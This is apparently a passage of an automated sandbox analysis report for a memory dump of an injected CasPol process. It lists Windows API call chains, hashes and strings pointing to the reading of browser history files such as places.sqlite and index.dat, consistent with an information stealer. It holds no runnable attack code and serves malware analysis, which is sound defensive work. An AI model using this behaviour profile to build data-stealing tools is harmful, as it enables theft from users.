                                                                                                                  • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$memcmp
                                                                                                                  • String ID: $$8
                                                                                                                  • API String ID: 2808797137-435121686
                                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                  Strings
                                                                                                                  • duplicate column name: %s, xrefs: 004307FE
                                                                                                                  • too many columns on %s, xrefs: 00430763
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                  • API String ID: 0-1445880494
                                                                                                                  • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                  • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                  • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                  • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                                  • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                  • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1979745280-0
                                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                  • Opcode ID: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                  • Opcode Fuzzy Hash: 05f9737078ef75c1c81c27231a8cbd2d8a2d76354893ce3757c3369515f6e8ef
                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                    • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                  • GetLastError.KERNEL32 ref: 00417627
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$File$PointerRead
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 839530781-0
                                                                                                                  • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                  • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                  • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                  • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID: *.*$index.dat
                                                                                                                  • API String ID: 1974802433-2863569691
                                                                                                                  • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                  • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                  • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                  • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                  APIs
                                                                                                                  • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                  • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                  • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$FilePointer
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1156039329-0
                                                                                                                  • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                  • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                  • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                  • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                  • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3397143404-0
                                                                                                                  • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                  • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                  • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                  • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                  • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1125800050-0
                                                                                                                  • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                  • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                  • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                  • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                  • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandleSleep
                                                                                                                  • String ID: }A
                                                                                                                  • API String ID: 252777609-2138825249
                                                                                                                  • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                  • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                                  • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                                  • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                                  APIs
                                                                                                                  • malloc.MSVCRT ref: 00409A10
                                                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                  • free.MSVCRT ref: 00409A31
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3056473165-0
                                                                                                                  • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                  • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                  • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                                  • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: d
                                                                                                                  • API String ID: 0-2564639436
                                                                                                                  • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                  • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                  • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                  • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: BINARY
                                                                                                                  • API String ID: 2221118986-907554435
                                                                                                                  • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                  • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                  • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                  • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID: /stext
                                                                                                                  • API String ID: 2081463915-3817206916
                                                                                                                  • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                  • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                  • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                  • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                    • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                  • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2445788494-0
                                                                                                                  • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                  • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                  • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                                                                                  • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3150196962-0
                                                                                                                  • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                  • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                  • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                  • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: malloc
                                                                                                                  • String ID: failed to allocate %u bytes of memory
                                                                                                                  • API String ID: 2803490479-1168259600
                                                                                                                  • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                  • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                  • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                  • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041BDDF
                                                                                                                  • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmpmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1065087418-0
                                                                                                                  • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                  • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                  • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                  • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                    • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                  • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                    • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                    • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                    • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                    • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1381354015-0
                                                                                                                  • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                  • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                  • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                  • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2221118986-0
                                                                                                                  • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                  • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                  • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                  • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1294909896-0
                                                                                                                  • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                  • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                  • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                  • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
